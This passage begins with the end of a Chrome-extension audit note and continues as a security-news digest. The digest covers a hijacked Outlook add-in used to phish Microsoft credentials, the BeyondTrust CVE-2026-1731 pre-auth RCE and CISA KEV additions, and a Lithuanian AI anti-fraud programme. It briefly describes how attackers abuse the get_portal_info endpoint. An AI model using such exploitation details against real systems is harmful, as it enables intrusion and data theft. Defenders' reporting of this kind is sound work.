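On Windows the profile path is `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions`; enterprise-deployed extensions also appear under the `ExtensionInstallForcelist` policy and should be reconciled against it. The block-list here has one entry because that is the only ID the reports above name.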

Hijacked Outlook Add-in Used to Steal 4,000 Microsoft Credentials

Updated: · First: 16.02.2026 14:55 · 📰 1 src / 1 articles

A legitimate AgreeTo Outlook add-in was hijacked and turned into a phishing kit, stealing over 4,000 Microsoft account credentials. The attackers seized control of an abandoned domain associated with the add-in to serve a fake Microsoft login page. This incident highlights how overlooked and abandoned assets can become attack vectors. The add-in, distributed through Microsoft's store, ran inside Outlook, where users handle sensitive communications. It could request permissions to read and modify emails, exploiting the implicit trust in Microsoft's store. Microsoft has since removed the add-in from its store.

Critical Pre-Auth RCE Vulnerability in BeyondTrust Remote Support and PRA

Updated: 16.02.2026 14:33 · First: 09.02.2026 10:03 · 📰 6 src / 10 articles

BeyondTrust has patched a critical pre-authentication remote code execution (RCE) vulnerability (CVE-2026-1731, CVSS 9.9) in its Remote Support (RS) and Privileged Remote Access (PRA) products. The flaw lets unauthenticated attackers execute OS commands in the context of the site user through maliciously crafted client requests, in low-complexity attacks that require no user interaction, leading to unauthorized access, data exfiltration, and service disruption. It affects RS versions 25.3.1 and prior and PRA versions 24.3.4 and prior; fixes are available in RS 25.3.2 and later and PRA 25.1.1 and later. Self-hosted customers not subscribed to automatic updates must apply the patches manually. In June 2025, BeyondTrust had fixed a separate high-severity RS/PRA server-side template injection vulnerability.
The vulnerability was discovered on January 31, 2026 by Harsh Jaiswal and the Hacktron AI team. Approximately 11,000 exposed instances were identified, around 8,500 of them on-prem deployments; BeyondTrust secured all RS/PRA cloud systems by February 2, 2026. Attackers have since begun exploiting CVE-2026-1731 in the wild, abusing the get_portal_info endpoint to extract the x-ns-company value before establishing a WebSocket channel, and a proof-of-concept exploit targeting the /get_portal_info endpoint was published on GitHub. CISA added CVE-2026-1731 to its Known Exploited Vulnerabilities (KEV) catalog and ordered U.S. government agencies to remediate by February 16, 2026.
CISA added four further vulnerabilities to KEV at the same time: CVE-2026-20700, CVE-2025-15556, CVE-2025-40536, and CVE-2024-43468. CVE-2024-43468 was patched by Microsoft in October 2024 but is still being exploited in real-world attacks, with a federal remediation deadline of March 5, 2026. CVE-2026-20700 was acknowledged by Apple to have been exploited in sophisticated attacks against specific targeted individuals on iOS versions before iOS 26. Exploitation of CVE-2025-15556 has been attributed to the China-linked state-sponsored threat actor Lotus Blossom, delivering a previously undocumented backdoor called Chrysalis.

Lithuania's AI-Driven Cyber Fraud Defense Initiatives

Updated: · First: 16.02.2026 13:55 · 📰 1 src / 1 articles

Lithuania is advancing its cybersecurity capabilities through the 'Safe and Inclusive E-Society' mission, focusing on AI-driven fraud defense and digital resilience. The initiative, coordinated by Kaunas University of Technology (KTU) and funded by the government, aims to protect citizens and critical infrastructure from evolving cyber threats, including AI-generated fraud. The mission involves collaboration between universities, cybersecurity firms, and industry associations to develop adaptive, self-learning security solutions. The project addresses the rise of Generative AI (GenAI) and Large Language Models (LLMs) in cybercrime, which enable highly personalized and realistic phishing attacks. Traditional detection methods are becoming ineffective against these advanced threats. Lithuania's efforts include developing AI-powered defense systems for FinTech, critical infrastructure, and public safety, as well as combating disinformation and enhancing cyber threat intelligence.